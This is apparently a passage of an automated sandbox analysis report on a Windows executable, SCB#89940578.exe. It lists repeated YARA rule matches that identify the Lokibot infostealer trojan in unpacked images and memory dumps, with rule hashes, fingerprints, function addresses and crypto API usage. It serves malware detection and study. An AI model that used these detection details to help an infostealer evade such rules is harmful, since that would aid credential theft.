Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0298D2A4	0_2_0298D2A4
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_04F38D08	0_2_04F38D08
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_04F30040	0_2_04F30040
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_04F38CF9	0_2_04F38CF9
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_073723E0	0_2_073723E0
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_073720C8	0_2_073720C8
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07371688	0_2_07371688
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07371450	0_2_07371450
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07371441	0_2_07371441
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_073723D1	0_2_073723D1
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737F3C8	0_2_0737F3C8
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07370228	0_2_07370228
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07370219	0_2_07370219
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737D2B8	0_2_0737D2B8
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737D2A9	0_2_0737D2A9
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07370006	0_2_07370006
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07373070	0_2_07373070
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07373060	0_2_07373060
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_073720B8	0_2_073720B8
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_073710E0	0_2_073710E0
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_073710D1	0_2_073710D1
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07375F70	0_2_07375F70
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07375F61	0_2_07375F61
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737EF90	0_2_0737EF90
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737EF82	0_2_0737EF82
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737CE80	0_2_0737CE80
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737CA48	0_2_0737CA48
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_07374910	0_2_07374910
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 0_2_0737490E	0_2_0737490E
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: String function: 00405B6F appears 42 times

Source: SCB#89940578.exe

Static PE information: invalid certificate

Source: SCB#89940578.exe, 00000000.00000002.1709695361.0000000009FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SCB#89940578.exe
Source: SCB#89940578.exe, 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SCB#89940578.exe
Source: SCB#89940578.exe, 00000000.00000002.1705262082.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SCB#89940578.exe
Source: SCB#89940578.exe	Binary or memory string: OriginalFilenameHCJ.exeX vs SCB#89940578.exe

Source: SCB#89940578.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: SCB#89940578.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'

